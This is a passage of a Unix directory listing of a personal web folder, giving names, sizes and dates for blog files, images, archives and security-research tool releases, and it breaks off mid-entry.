-rw-r--r-- 1 effugas effugas 1805 Jan 31 2008 fm.gif -rwxr-xr-x 1 effugas effugas 7284 Aug 29 2007 fonts.PNG -rwxr-xr-x 1 effugas effugas 17045 Aug 29 2007 fonts2.PNG -rwxr-xr-x 1 effugas effugas 18363 Aug 30 2007 fonts3.PNG -rw-r--r-- 1 effugas effugas 10228 Aug 31 2007 fonts4.PNG -rw-r--r-- 1 effugas effugas 67673 Aug 31 2007 fonts6.PNG -rwxr-xr-x 1 effugas effugas 18378 Sep 2 2007 fonts7.PNG -rw-r--r-- 1 effugas effugas 48746 Aug 7 2008 foo -rw-r--r-- 1 effugas effugas 1526 Mar 19 2003 foo.html -rw-r--r-- 1 effugas effugas 137216 Nov 15 2002 foo.ppt -rw-r--r-- 1 effugas effugas 419 Nov 16 2005 footer.php drwxr-xr-x 2 effugas effugas 512 Sep 13 2004 foovid -rw-r--r-- 1 effugas effugas 5262 Mar 12 2008 form_utils.js -rw-r--r-- 1 effugas effugas 46384 Jul 8 2008 formatting.php -rw-r--r-- 1 effugas effugas 851 Apr 18 2008 forms.js -rw-r--r-- 1 effugas effugas 395 Nov 14 2002 frame2.html -rw-r--r-- 1 effugas effugas 512 Nov 14 2002 frameok.html -rw-r--r-- 1 effugas effugas 513 Nov 14 2002 frametb.html -rw-r--r-- 1 effugas effugas 32672 Oct 9 2005 fsm_brooch.jpg -rw-r--r-- 1 effugas effugas 127 Apr 16 2006 ftr.html drwxr-xr-x 2 effugas effugas 512 Aug 19 2008 fullscreen -rw-r--r-- 1 effugas effugas 3408 Jun 27 2008 fullscreen.htm -rw-r--r-- 1 effugas effugas 769 Jul 1 2001 fulltest.gif -rw-r--r-- 1 effugas effugas 245 May 4 2007 functions.php -rw-r--r-- 1 effugas effugas 2023 May 20 2008 functions.wp-scripts.php -rw-r--r-- 1 effugas effugas 1136 Jun 4 2008 functions.wp-styles.php -rw-r--r-- 1 effugas effugas 165504 Feb 22 2005 fx.exe -rw-r--r-- 1 effugas effugas 684 Jul 9 2008 gallery.js -rw-r--r-- 1 effugas effugas 1339053 Aug 29 2003 games.pdf -rw-r--r-- 1 effugas effugas 166 Apr 20 2005 gd.html -rw-r--r-- 1 effugas effugas 16742 May 19 2008 gear.png -rw-r--r-- 1 effugas effugas 11075 Jul 11 2008 gears-manifest.php -rw-r--r-- 1 effugas effugas 40000 Jun 11 2008 general-template.php -rw-r--r-- 1 effugas effugas 2188 Jan 17 2008 general.php -rw-r--r-- 1 effugas effugas 63 Nov 14 2002 get.html -rw-r--r-- 1 effugas effugas 11375 Jan 4 2008 gettext.php -rw-r--r-- 1 effugas effugas 524414 Dec 14 2004 glance.zip -rw-r--r-- 1 effugas effugas 588 Jul 13 2008 global-rtl.css -rw-r--r-- 1 effugas effugas 3019 May 8 2008 global.css -rw-r--r-- 1 effugas effugas 741 Jul 18 06:31 gmap.html -rw-r--r-- 1 effugas effugas 23 May 10 12:13 googlehostedservice.html -rw-r--r-- 1 effugas effugas 983 Jan 31 2008 gotmoxie.png drwxr-xr-x 2 effugas effugas 512 Aug 23 2005 graphs -rw-r--r-- 1 effugas effugas 10897 May 4 2008 greymatter.php -rw-r--r-- 1 effugas effugas 425256 Dec 5 2002 guru.jpg -rw-r--r-- 1 effugas effugas 433321 Dec 5 2002 guru2.jpg -rw-r--r-- 1 effugas effugas 132608 Nov 17 2002 gwc3.ppt -rw-r--r-- 1 effugas effugas 5435 Nov 14 2002 hack_small.jpg -rw-r--r-- 1 effugas effugas 57096 Mar 11 2002 hackproofing.jpg -rw-r--r-- 1 effugas effugas 9266 Apr 30 2008 handlers.js -rw-r--r-- 1 effugas effugas 177831 Sep 27 2005 hank_chinaski.pdf -rw-r--r-- 1 effugas effugas 611325 Jul 27 2006 hardcorr_1.png -rw-r--r-- 1 effugas effugas 1737769 Aug 10 2004 haxor_full.jpg -rw-r--r-- 1 effugas effugas 41091 Aug 10 2004 haxor_plate.jpg -rw-r--r-- 1 effugas effugas 233 Feb 3 2006 hcp1.html -rw-r--r-- 1 effugas effugas 2144 Jun 13 2007 header-img.php -rw-r--r-- 1 effugas effugas 1197 Oct 17 2007 header.php -rw-r--r-- 1 effugas effugas 427 Mar 16 12:23 headers.php -rw-r--r-- 1 effugas effugas 46717 Oct 1 2005 heartrate.png -rw-r--r-- 1 effugas effugas 2021 Jun 16 2008 hello.php -rw-r--r-- 1 effugas effugas 295 Jan 31 2008 help.gif -rw-r--r-- 1 effugas effugas 127 Dec 12 2006 heya.html -rw-r--r-- 1 effugas effugas 324 Feb 2 2006 highband.asx -rw-r--r-- 1 effugas effugas 315 Feb 2 2006 highband4.asx -rw-r--r-- 1 effugas effugas 365 Feb 2 2006 highband7.asx -rw-r--r-- 1 effugas effugas 272 Dec 24 2005 hikids.html -rw-r--r-- 1 effugas effugas 627 Dec 21 2006 hilite.htc -rw-r--r-- 1 effugas effugas 290661 Jan 19 2004 hipster.pdf -rw-r--r-- 1 effugas effugas 76338 Oct 26 2002 hiss1.jpg -rw-r--r-- 1 effugas effugas 67473 Oct 26 2002 hiss2.jpg -rw-r--r-- 1 effugas effugas 0 Oct 30 2005 history_of_art.jpg -rw-r--r-- 1 effugas effugas 8372 Jul 4 2002 hivercon.jpg -rwxrwxrwx 1 effugas effugas 797176 Dec 28 2006 hohoketto_0.0001.tar.gz -rw-r--r-- 1 effugas effugas 193879 Mar 19 2007 hopeful.jpg -rw-r--r-- 1 effugas effugas 769 Jan 17 2008 horizontal.gif -rwxr-xr-x 1 effugas effugas 294774 Aug 13 2006 hr_fourier.png -rw-r--r-- 1 effugas effugas 537 Feb 21 2008 html.png drwxr-xr-x 2 effugas effugas 512 Jan 24 2007 hv -rw-r--r-- 1 effugas effugas 170 Aug 27 2005 icon_arrow.gif -rw-r--r-- 1 effugas effugas 172 Aug 27 2005 icon_biggrin.gif -rw-r--r-- 1 effugas effugas 171 Aug 27 2005 icon_confused.gif -rw-r--r-- 1 effugas effugas 172 Aug 27 2005 icon_cool.gif -rw-r--r-- 1 effugas effugas 498 Aug 27 2005 icon_cry.gif -rw-r--r-- 1 effugas effugas 170 Aug 27 2005 icon_eek.gif -rw-r--r-- 1 effugas effugas 236 Aug 27 2005 icon_evil.gif -rw-r--r-- 1 effugas effugas 236 Aug 27 2005 icon_exclaim.gif -rw-r--r-- 1 effugas effugas 176 Aug 27 2005 icon_idea.gif -rw-r--r-- 1 effugas effugas 336 Aug 27 2005 icon_lol.gif -rw-r--r-- 1 effugas effugas 174 Aug 27 2005 icon_mad.gif -rw-r--r-- 1 effugas effugas 349 Aug 27 2005 icon_mrgreen.gif -rw-r--r-- 1 effugas effugas 171 Aug 27 2005 icon_neutral.gif -rw-r--r-- 1 effugas effugas 248 Aug 27 2005 icon_question.gif -rw-r--r-- 1 effugas effugas 176 Aug 27 2005 icon_razz.gif -rw-r--r-- 1 effugas effugas 650 Aug 27 2005 icon_redface.gif -rw-r--r-- 1 effugas effugas 485 Aug 27 2005 icon_rolleyes.gif -rw-r--r-- 1 effugas effugas 171 Aug 27 2005 icon_sad.gif -rw-r--r-- 1 effugas effugas 174 Aug 27 2005 icon_smile.gif -rw-r--r-- 1 effugas effugas 174 Aug 27 2005 icon_surprised.gif -rw-r--r-- 1 effugas effugas 238 Aug 27 2005 icon_twisted.gif -rw-r--r-- 1 effugas effugas 170 Aug 27 2005 icon_wink.gif -rw-r--r-- 1 effugas effugas 11505 Jun 4 2008 icons.gif -rw-r--r-- 1 effugas effugas 614 Jun 16 2004 id_dsa.pub -rw-r--r-- 1 effugas effugas 606 Mar 27 2008 ie-rtl.css -rw-r--r-- 1 effugas effugas 2335 Apr 18 2008 ie.css -rw-r--r-- 1 effugas effugas 43 Feb 2 2006 if.html -rw-r--r-- 1 effugas effugas 71 Feb 3 2006 if2.html -rw-r--r-- 1 effugas effugas 82 Feb 3 2006 if2b.html -rw-r--r-- 1 effugas effugas 107 Feb 3 2006 if2c.html -rw-r--r-- 1 effugas effugas 86 Feb 9 2006 if3b.html -rw-r--r-- 1 effugas effugas 83 Feb 9 2006 if3c.html -rw-r--r-- 1 effugas effugas 0 Feb 13 2006 if4.html -rw-r--r-- 1 effugas effugas 1233 Dec 12 2006 ifdom.html -rw-r--r-- 1 effugas effugas 248 Nov 18 2006 ifr.html -rw-r--r-- 1 effugas effugas 101 Jul 3 2008 image.gif -rw-r--r-- 1 effugas effugas 4668 Jun 27 2008 image.htm -rw-r--r-- 1 effugas effugas 6256 Jun 4 2008 image.js -rw-r--r-- 1 effugas effugas 2513 Mar 26 2008 image.php -rw-r--r-- 1 effugas effugas 3701 Jun 9 2008 image.png drwxr-xr-x 2 effugas effugas 512 Jul 6 2008 images drwxr-xr-x 2 effugas effugas 512 Oct 31 2005 img -rw-r--r-- 1 effugas effugas 68 Feb 6 2006 img.html -rw-r--r-- 1 effugas effugas 28093 Jul 4 2002 img.jpg drwxr-xr-x 2 effugas effugas 512 Jul 15 2008 import -rw-r--r-- 1 effugas effugas 1445 Feb 23 2008 import.php drwxr-sr-x 2 effugas effugas 512 Nov 15 2005 includes -rw-r--r-- 1 effugas effugas 514 Feb 21 2008 index-extra.php -rw-r--r-- 1 effugas effugas 42835 Nov 14 2002 index-old.php -rw-r--r-- 1 effugas effugas 107182 Sep 22 2008 index.html -rw-r--r-- 1 effugas effugas 397 Aug 24 2008 index.php -rw-r--r-- 1 effugas effugas 0 Aug 19 2008 index.php.1 -rw-r--r-- 1 effugas effugas 0 Jul 15 2008 index.php_er_hello -rw-r--r-- 1 effugas effugas 1064 Jul 8 2008 index2.php -rwxr-xr-x 1 effugas effugas 1231 Sep 23 2003 index_old.php -rw-r--r-- 1 effugas effugas 108 Nov 20 2002 index_orig.php -rw-r--r-- 1 effugas effugas 1062 Jul 9 2008 index_safe.php -rw-r--r-- 1 effugas effugas 4727 Apr 18 2008 inline.php drwxr-xr-x 3 effugas effugas 512 Aug 19 2008 inlinepopups drwxr-xr-x 2 effugas effugas 512 Nov 30 2005 insane_dns -rw-r--r-- 1 effugas effugas 4043 May 20 2008 install-helper.php -rw-r--r-- 1 effugas effugas 363 Jul 13 2008 install-rtl.css -rw-r--r-- 1 effugas effugas 2213 Jul 10 2008 install.css -rw-r--r-- 1 effugas effugas 1144832 Apr 1 2007 install.msi -rw-r--r-- 1 effugas effugas 4272 Jul 10 2008 install.php -rw-r--r-- 1 effugas effugas 2808 Feb 28 2008 interactive.png -rw-r--r-- 1 effugas effugas 77084 Feb 5 2008 interface.js -rw-r--r-- 1 effugas effugas 19405 Mar 31 2007 ioa1.html -rw-r--r-- 1 effugas effugas 1786734 Oct 29 2004 irvid.mpg -rw-r--r-- 1 effugas effugas 40960 Oct 22 2006 iso -rw-r--r-- 1 effugas effugas 70 Jan 17 2008 items.gif -rw-r--r-- 1 effugas effugas 108 Feb 6 2006 its1.html -rw-r--r-- 1 effugas effugas 5998 Feb 27 2008 jkw.php drwxr-xr-x 2 effugas effugas 512 Oct 13 2004 joshvid drwxr-xr-x 2 effugas effugas 512 Jul 15 2008 jquery -rw-r--r-- 1 effugas effugas 4462 Mar 2 2008 jquery.color.js -rw-r--r-- 1 effugas effugas 31465 Mar 2 2008 jquery.form.js -rw-r--r-- 1 effugas effugas 31111 Jun 3 2008 jquery.js -rw-r--r-- 1 effugas effugas 3457 Jan 10 2008 jquery.schedule.js drwxr-xr-x 2 effugas effugas 512 Jul 8 2008 js -rw-r--r-- 1 effugas effugas 517 Feb 21 2008 js.png -rw-r--r-- 1 effugas effugas 1926 Jul 21 2007 jsonmin.js drwxrwxrwx 2 effugas effugas 512 Sep 7 2007 k256 -rwxr-xr-x 1 effugas effugas 3147 Aug 31 2005 katblog_nopw.pl -rw-r--r-- 1 effugas effugas 178092 Feb 21 2003 kde31.png -rw-r--r-- 1 effugas effugas 4840158 Jul 22 2006 kern_multi.png -rw-r--r-- 1 effugas effugas 30293 May 20 2008 kses.php -rw-r--r-- 1 effugas effugas 1043 Mar 19 2007 kubrickbg-ltr.jpg -rw-r--r-- 1 effugas effugas 1657 Mar 19 2007 kubrickbg-rtl.jpg -rw-r--r-- 1 effugas effugas 556 Feb 15 2005 kubrickbgcolor.jpg -rw-r--r-- 1 effugas effugas 1014 Feb 15 2005 kubrickbgwide.jpg -rw-r--r-- 1 effugas effugas 2443 Feb 15 2005 kubrickfooter.jpg -rw-r--r-- 1 effugas effugas 7868 Feb 15 2005 kubrickheader.jpg -rw-r--r-- 1 effugas effugas 9809 Jun 9 2008 l10n.php drwxr-xr-x 2 effugas effugas 512 Aug 19 2008 langs -rw-r--r-- 1 effugas effugas 78480 Sep 15 2003 latency_scan.txt -rw-r--r-- 1 effugas effugas 1304725 Aug 24 2008 latest.tar.gz -rw-r--r-- 1 effugas effugas 1511562 Jul 15 2008 latest.zip -rw-r--r-- 1 effugas effugas 431 Feb 2 2006 launch6.wvx -rw-r--r-- 1 effugas effugas 122535853 Jun 20 2007 lauren.zip -rw-r--r-- 1 effugas effugas 1485 Nov 15 2002 layout-tail.inc -rw-r--r-- 1 effugas effugas 514 Nov 14 2002 layout.inc -rwxr-xr-x 1 effugas effugas 12691 Nov 15 2002 lc.c -rw-r--r-- 1 effugas effugas 184 Jul 1 2001 left.gif -rwxr-xr-x 1 effugas effugas 5658 Sep 18 2004 less.tgz -rw-r--r-- 1 effugas effugas 530612 Jul 24 2005 lfl_fr.zip -rw-r--r-- 1 effugas effugas 1197468 Dec 23 2005 lfl_fr_alpha.zip drwxr-xr-x 2 effugas effugas 512 May 19 2005 lfl_v1 -rw-r--r-- 1 effugas effugas 9410414 May 2 2005 lfl_v1_alpha.zip drwxr-xr-x 2 effugas effugas 512 Oct 15 2003 lgl -rw-r--r-- 1 effugas effugas 15407 Aug 24 2008 license.txt -rw-r--r-- 1 effugas effugas 34837 Jan 16 2007 limo.jpg -rw-r--r-- 1 effugas effugas 691 May 20 2008 link-add.php -rw-r--r-- 1 effugas effugas 2156 Mar 26 2008 link-category.php -rw-r--r-- 1 effugas effugas 4030 May 4 2008 link-import.php -rw-r--r-- 1 effugas effugas 7507 May 4 2008 link-manager.php -rw-r--r-- 1 effugas effugas 1760 May 20 2008 link-parse-opml.php -rw-r--r-- 1 effugas effugas 26020 Jul 14 2008 link-template.php -rw-r--r-- 1 effugas effugas 2657 Jun 27 2008 link.htm -rw-r--r-- 1 effugas effugas 1739 May 30 2008 link.js -rw-r--r-- 1 effugas effugas 2397 May 20 2008 link.php -rw-r--r-- 1 effugas effugas 189 Jan 28 2008 links.php -rw-r--r-- 1 effugas effugas 16030 Dec 31 2003 lips1.jpg -rw-r--r-- 1 effugas effugas 50034 Dec 15 2003 little_big_man.txt -rw-r--r-- 1 effugas effugas 5660 Feb 29 2008 livejournal.php -rw-r--r-- 1 effugas effugas 1849 Jun 17 2008 loading-publish.gif -rw-r--r-- 1 effugas effugas 2530 May 13 2008 loading.gif -rw-r--r-- 1 effugas effugas 5886 Jan 9 2008 loadingAnimation.gif -rw-r--r-- 1 effugas effugas 51 Feb 9 2006 local.html -rw-r--r-- 1 effugas effugas 9533 Jan 10 2008 locale.php -rw-r--r-- 1 effugas effugas 3081047 Feb 23 2006 location_set_dns2.tar.gz.gpg -rw-r--r-- 1 effugas effugas 6747 Feb 13 2005 lock2.html -rwxr-xr-x 1 effugas effugas 810 Feb 5 2005 lockmart.html -rw-r--r-- 1 effugas effugas 12391 Feb 5 2005 lockmart.js -rw-r--r-- 1 effugas effugas 476 Jul 13 2008 login-rtl.css -rw-r--r-- 1 effugas effugas 1436 Mar 8 2008 login.css -rw-r--r-- 1 effugas effugas 141 Nov 14 2002 login.html drwxr-xr-x 2 effugas effugas 512 Oct 17 2005 logo -rw-r--r-- 1 effugas effugas 880 Dec 22 2007 logo-ghost.png -rw-r--r-- 1 effugas effugas 3184 Feb 19 2008 logo-login.gif -rw-r--r-- 1 effugas effugas 1238 May 19 2008 logo.gif -rw-r--r-- 1 effugas effugas 13266 Mar 17 2003 logo3.jpg -rwxr-xr-x 1 effugas effugas 3748783 Sep 29 2008 love.png -rwxr-xr-x 1 effugas effugas 3372118 Sep 30 2008 love2.jpg drwxr-xr-x 2 effugas effugas 512 Jul 15 2007 ludivu -rw-r--r-- 1 effugas effugas 73525 Jul 16 2007 ludivu_alpha.zip -rw-r--r-- 1 effugas effugas 207 Jul 25 2008 macFFBgHack.png -rw-r--r-- 1 effugas effugas 2667 Jul 16 2004 maddns.pl -rw-r--r-- 1 effugas effugas 18993 Jun 1 2005 mainimg.jpg -rw-r--r-- 1 effugas effugas 55457 Jun 6 2004 malta.jpg -rw-r--r-- 1 effugas effugas 5578752 Aug 8 2006 mario3.png -rwx------ 1 effugas effugas 481817 Sep 1 2007 marker.html -rw-r--r-- 1 effugas effugas 92904 Sep 1 2007 marker1.png -rw-r--r-- 1 effugas effugas 92212 Sep 1 2007 marker2.png -rw-r--r-- 1 effugas effugas 113739 Sep 1 2007 markerfelt.png -rw-r--r-- 1 effugas effugas 1125 Dec 7 2006 marqueeHoriz.gif -rw-r--r-- 1 effugas effugas 1141 Dec 7 2006 marqueeVert.gif -rw-r--r-- 1 effugas effugas 103426 Oct 14 2003 mass_scan.lvhist.gz -rwxr-xr-x 1 effugas effugas 2976737 Sep 30 2008 matrix.jpg drwxr-xr-x 2 effugas effugas 1024 Aug 30 2005 mcfrontalot -rw-r--r-- 1 effugas effugas 4120 Jan 17 2008 mclayer.js -rw-r--r-- 1 effugas effugas 1786 Jun 4 2008 mctabs.js -rwxr-xr-x 1 effugas effugas 8458 Dec 13 2004 md5.c -rw-r--r-- 1 effugas effugas 79285 Dec 8 2004 md5_anim.gif -rw-r--r-- 1 effugas effugas 43311 Dec 8 2004 md5_anim2.gif -rw-r--r-- 1 effugas effugas 4411 Dec 8 2004 md5_diff3.png -rw-r--r-- 1 effugas effugas 55898 Dec 6 2004 md5_someday.pdf -rw-r--r-- 1 effugas effugas 55831 Dec 8 2004 md5_vec1.png -rw-r--r-- 1 effugas effugas 28758 Dec 8 2004 md5_vec1.txt -rw-r--r-- 1 effugas effugas 51554 Dec 8 2004 md5_vec2.png -rw-r--r-- 1 effugas effugas 28758 Dec 8 2004 md5_vec2.txt -rw-r--r-- 1 effugas effugas 69848 Jan 19 2006 md5coll_view.c -rw-r--r-- 1 effugas effugas 1650 Aug 29 2004 md5test.pl drwxr-xr-x 5 effugas effugas 512 Aug 19 2008 media -rw-r--r-- 1 effugas effugas 72 Feb 10 2008 media-button-gallery.gif -rw-r--r-- 1 effugas effugas 69 Feb 10 2008 media-button-image.gif -rw-r--r-- 1 effugas effugas 188 Feb 10 2008 media-button-music.gif -rw-r--r-- 1 effugas effugas 141 Feb 10 2008 media-button-other.gif -rw-r--r-- 1 effugas effugas 68 Feb 10 2008 media-button-video.gif -rw-r--r-- 1 effugas effugas 723 Feb 10 2008 media-buttons.gif -rw-r--r-- 1 effugas effugas 367 Mar 19 2008 media-rtl.css -rw-r--r-- 1 effugas effugas 1681 Jul 11 2008 media-upload.js -rw-r--r-- 1 effugas effugas 1141 Mar 10 2008 media-upload.php -rw-r--r-- 1 effugas effugas 4830 Jul 9 2008 media.css -rw-r--r-- 1 effugas effugas 149 Jul 3 2008 media.gif -rw-r--r-- 1 effugas effugas 32147 Jun 27 2008 media.htm -rw-r--r-- 1 effugas effugas 17903 Jun 4 2008 media.js -rw-r--r-- 1 effugas effugas 52773 Jul 12 2008 media.php -rw-r--r-- 1 effugas effugas 5920 Jun 4 2008 menu-header.php -rw-r--r-- 1 effugas effugas 6629 Jul 10 2008 menu.php -rw-r--r-- 1 effugas effugas 68 Jan 17 2008 menu_arrow.gif -rw-r--r-- 1 effugas effugas 70 Jan 17 2008 menu_check.gif -rwxr-xr-x 1 effugas effugas 47959 Jun 11 2006 mercury.txt -rwxr-xr-x 1 effugas effugas 1227 Oct 17 2005 meta_index.php -rw-r--r-- 1 effugas effugas 3445822 Jul 31 2006 mfc44u.png -rw-r--r-- 1 effugas effugas 406 Jul 1 2001 middle.gif -rw-r--r-- 1 effugas effugas 87 Jul 1 2001 midsmall.gif -rw-r--r-- 1 effugas effugas 12159 Feb 11 2001 minbar_gimp.jpg -rw-r--r-- 1 effugas effugas 12181 Feb 11 2001 minbar_netscape.jpg -rw-r--r-- 1 effugas effugas 12275 Feb 11 2001 minbar_xterm.jpg drwxr-sr-x 2 effugas effugas 1024 Oct 17 2005 misc -rw-r--r-- 1 effugas effugas 4477 Jul 1 2008 misc.php -rw-r--r-- 1 effugas effugas 31958646 May 22 2007 ml.zip -rw-r--r-- 1 effugas effugas 100 May 20 2008 moderation.php drwxr-sr-x 7 effugas effugas 1024 Nov 17 2005 modules -rw-r--r-- 1 effugas effugas 108 Jan 31 2008 more.gif -rw-r--r-- 1 effugas effugas 146 Jan 31 2008 more_bug.gif -rw-r--r-- 1 effugas effugas 118694 Aug 9 2004 mousetrap.jpg -rw-r--r-- 1 effugas effugas 1530411 Jul 31 2006 msvc771.png drwxr-xr-x 14 effugas effugas 1024 Sep 26 2005 mt -rw-r--r-- 1 effugas effugas 15140 May 27 2008 mt.php drwxr-xr-x 2 effugas effugas 512 Dec 21 2006 my drwxr-xr-x 6 effugas effugas 3072 Jan 21 2005 myagency -rw-r--r-- 1 effugas effugas 1167179 Jan 21 2005 myagency.zip -rw-r--r-- 1 effugas effugas 1164540 Jan 21 2005 myagency2.zip -rw-r--r-- 1 effugas effugas 1187786 Jan 21 2005 myagency4.zip drwxrwxrwx 4 effugas effugas 512 Jan 22 2007 mys -rw-r--r-- 1 effugas effugas 43218 Jan 24 2007 mys.jpg drwxr-xr-x 2 effugas effugas 512 Jan 17 2007 mys2 -rwx------ 1 effugas effugas 1763 Jan 22 2007 mys_swf drwxrwxrwx 2 effugas effugas 512 Feb 16 2007 mys_wmp -rw-r--r-- 1 effugas effugas 938856 Nov 11 2003 n2.exe -rw-r--r-- 1 effugas effugas 918576 Nov 11 2003 nachi2000.exe -rw-r--r-- 1 effugas effugas 529 Jul 21 2004 name.c -rw-r--r-- 1 effugas effugas 2275 Nov 14 2002 nasa.txt -rw-r--r-- 1 effugas effugas 15935 Apr 18 2008 native.php -rw-r--r-- 1 effugas effugas 2707776 Aug 30 2005 nerdpower.avi -rw-r--r-- 1 effugas effugas 373 Feb 8 2006 netl.html -rw-r--r-- 1 effugas effugas 71840 Oct 14 2003 netmap_a.swf drwxr-xr-x 7 effugas effugas 512 Jul 7 2003 new -rw-r--r-- 1 effugas effugas 2376 Aug 27 2004 ngdebug.c -rwxr-xr-x 1 effugas effugas 53253 Mar 30 08:55 nmap-conficker.zip -rw-r--r-- 1 effugas effugas 45563 Feb 11 2001 nnshot.jpg -rw-r--r-- 1 effugas effugas 792 Jul 9 2008 no.png -rw-r--r-- 1 effugas effugas 42567 Feb 11 2001 noisewall.jpg -rw-r--r-- 1 effugas effugas 38665 Apr 15 2003 nokioops.jpg -rwxr-xr-x 1 effugas effugas 2444 May 1 2006 nonono.txt -rw-r--r-- 1 effugas effugas 2415 Nov 10 2000 not_available256.gif -rw-r--r-- 1 effugas effugas 1000000 Apr 19 2006 ntos_small.html -rw-r--r-- 1 effugas effugas 3642895 Jul 21 2006 ntoskern.png drwxr-xr-x 4 effugas effugas 512 Nov 16 2005 nuke drwxr-xr-x 3 effugas effugas 512 Aug 19 2008 o2k7 -rw-r--r-- 1 effugas effugas 434 Feb 2 2006 ob.html -rw-r--r-- 1 effugas effugas 192 Feb 19 2006 obj.html -rw-r--r-- 1 effugas effugas 48 Feb 3 2006 obv.html -rw-r--r-- 1 effugas effugas 23 Feb 2 2006 obvious.html -rw-r--r-- 1 effugas effugas 117337 Feb 11 2001 ohhhyeah.jpg -rw-r--r-- 1 effugas effugas 127 Jan 10 2006 ohnoz.html -rw-r--r-- 1 effugas effugas 73 Jan 10 2006 ohnoz2.html -rw-r--r-- 1 effugas effugas 83 Jan 30 2006 ohnoz_print.html -rw-r--r-- 1 effugas effugas 127 Jan 10 2006 ohnoz_res.html -rw-r--r-- 1 effugas effugas 75 Jan 10 2006 ohnoz_smb.html -rw-r--r-- 1 effugas effugas 105528023 Mar 10 2007 okgo.zip drwxr-xr-x 19 effugas effugas 1024 Jul 19 2003 old_apps -rw-r--r-- 1 effugas effugas 2652 Nov 14 2002 omis-read.php -rw-r--r-- 1 effugas effugas 1161 Nov 14 2002 omis.php -rw-r--r-- 1 effugas effugas 7152 Sep 16 2003 onesixtyone-0.3.1.tar.gz -rw-r--r-- 1 effugas effugas 5433 Oct 7 2003 ong.jpg drwxr-xr-x 2 effugas effugas 512 Nov 15 2002 openqvis -rw-r--r-- 1 effugas effugas 1513839 Apr 25 2005 opte_1.pdf -rw-r--r-- 1 effugas effugas 8198 May 4 2008 options-discussion.php -rw-r--r-- 1 effugas effugas 6169 May 4 2008 options-general.php -rw-r--r-- 1 effugas effugas 230 Feb 13 2008 options-head.php -rw-r--r-- 1 effugas effugas 3953 May 4 2008 options-misc.php -rw-r--r-- 1 effugas effugas 7807 May 4 2008 options-permalink.php -rw-r--r-- 1 effugas effugas 1349 May 4 2008 options-privacy.php -rw-r--r-- 1 effugas effugas 3646 May 4 2008 options-reading.php -rw-r--r-- 1 effugas effugas 6823 Jun 23 2008 options-writing.php -rw-r--r-- 1 effugas effugas 2800 May 4 2008 options.php -rw-r--r-- 1 effugas effugas 2551286 Oct 16 2003 order3d.coords.wrl -rw-r--r-- 1 effugas effugas 2551240 Oct 16 2003 order3d_2.coords.wrl -rw-r--r-- 1 effugas effugas 2556114 Oct 16 2003 order3d_3.coords.wrl -rw-r--r-- 1 effugas effugas 108647 Oct 16 2003 order3d_3.coords.wrlz -rw-r--r-- 1 effugas effugas 794697 Oct 16 2003 order3d_4.coords.wrl -rw-r--r-- 1 effugas effugas 794697 Oct 16 2003 order3d_5.coords.wrl -rw-r--r-- 1 effugas effugas 794697 Oct 16 2003 order3d_6.coords.wrl -rw-r--r-- 1 effugas effugas 798093 Oct 18 2003 order3d_a.coords.wrl -rw-r--r-- 1 effugas effugas 798093 Oct 18 2003 order3d_b.coords.wrl -rw-r--r-- 1 effugas effugas 798093 Oct 18 2003 order3d_c.coords.wrl -rw-r--r-- 1 effugas effugas 9095 Jul 29 2004 ozymandns_src_0.1.tgz -rw-r--r-- 1 effugas effugas 2974167 Jul 29 2004 ozymandns_win_0.1.zip drwxr-xr-x 6 effugas effugas 512 Oct 18 2004 p3 -rw-r--r-- 1 effugas effugas 74221 May 25 2004 packetstorm.jpg -rw-r--r-- 1 effugas effugas 916 Jun 2 2008 page-new.php -rw-r--r-- 1 effugas effugas 108 Jan 31 2008 page.gif -rw-r--r-- 1 effugas effugas 1119 Mar 26 2008 page.js -rw-r--r-- 1 effugas effugas 616 Nov 18 2006 page.php -rw-r--r-- 1 effugas effugas 180 Jan 31 2008 page_bug.gif drwxr-xr-x 2 effugas effugas 512 Feb 1 2004 paketto lrwxr-xr-x 1 effugas effugas 26 Nov 14 2002 paketto-1.0.tar.gz -> paketto/paketto-1.0.tar.gz -rw-r--r-- 1 effugas effugas 848008 Dec 13 2002 paketto-1.01.tar.gz -rw-r--r-- 1 effugas effugas 1454185 Jul 30 2003 paketto-1.99-BH5.tar.gz -rw-r--r-- 1 effugas effugas 1457081 Sep 10 2003 paketto-1.999-1.tar.gz -rw-r--r-- 1 effugas effugas 1448746 Sep 10 2003 paketto-1.999-2.tar.gz -rw-r--r-- 1 effugas effugas 1444908 Sep 21 2003 paketto-1.999-3.tar.gz -rw-r--r-- 1 effugas effugas 1455702 Oct 7 2003 paketto-1.999-4.tar.gz -rw-r--r-- 1 effugas effugas 1445132 Sep 27 2003 paketto-1.999-4.tar.gz_broken -rw-r--r-- 1 effugas effugas 1455702 Oct 7 2003 paketto-1.999-5.tar.gz lrwxr-xr-x 1 effugas effugas 31 Dec 15 2003 paketto-2.00pre1.tar.gz -> paketto/paketto-2.00pre1.tar.gz -rw-r--r-- 1 effugas effugas 1458049 Dec 16 2003 paketto-2.00pre2.tar.gz -rw-r--r-- 1 effugas effugas 1545976 Jan 5 2004 paketto-2.00pre3.tar.gz -rw-r--r-- 1 effugas effugas 1483631 Apr 12 2004 paketto-2.00pre4.tar.gz -rw-r--r-- 1 effugas effugas 1521373 Jul 12 2004 paketto-2.00pre5.tar.gz -rw-r--r-- 1 effugas effugas 49787 Aug 26 2006 parking.pdf -rw-r--r-- 1 effugas effugas 631885 May 8 2004 particle.zip -rw-r--r-- 1 effugas effugas 2580 Mar 14 2008 password-strength-meter.js drwxr-xr-x 4 effugas effugas 512 Aug 19 2008 paste -rw-r--r-- 1 effugas effugas 1356 Jun 27 2008 pastetext.htm -rw-r--r-- 1 effugas effugas 976 Jan 17 2008 pastetext.js -rw-r--r-- 1 effugas effugas 46 Jan 17 2008 pasteword.css -rw-r--r-- 1 effugas effugas 1034 Jun 27 2008 pasteword.htm -rw-r--r-- 1 effugas effugas 1415 Feb 26 2008 pasteword.js -rw-r--r-- 1 effugas effugas 1424 Feb 21 2008 pdf.png -rw-r--r-- 1 effugas effugas 1235474 Feb 3 2007 pegleg-0.1.zip -rw-r--r-- 1 effugas effugas 1822720 Feb 25 2002 pgbeta3.pdf drwxr-xr-x 4 effugas effugas 512 Nov 14 2002 phen -rwxr-xr-x 1 effugas effugas 39142 May 3 2005 phengl.exe -rwxr-xr-x 1 effugas effugas 712470 Sep 4 2005 phengl.zip drwxr-xr-x 2 effugas effugas 512 Dec 24 2002 phentropy -rw-r--r-- 1 effugas effugas 338354 Feb 2 2004 photos.pdf drwxrwxr-x 14 effugas effugas 1024 Jan 10 2007 pics -rw-r--r-- 1 effugas effugas 59758 Feb 12 2002 pingmice.jpg drwxr-xr-x 10 effugas effugas 1024 Sep 16 2003 pk -rw-r--r-- 1 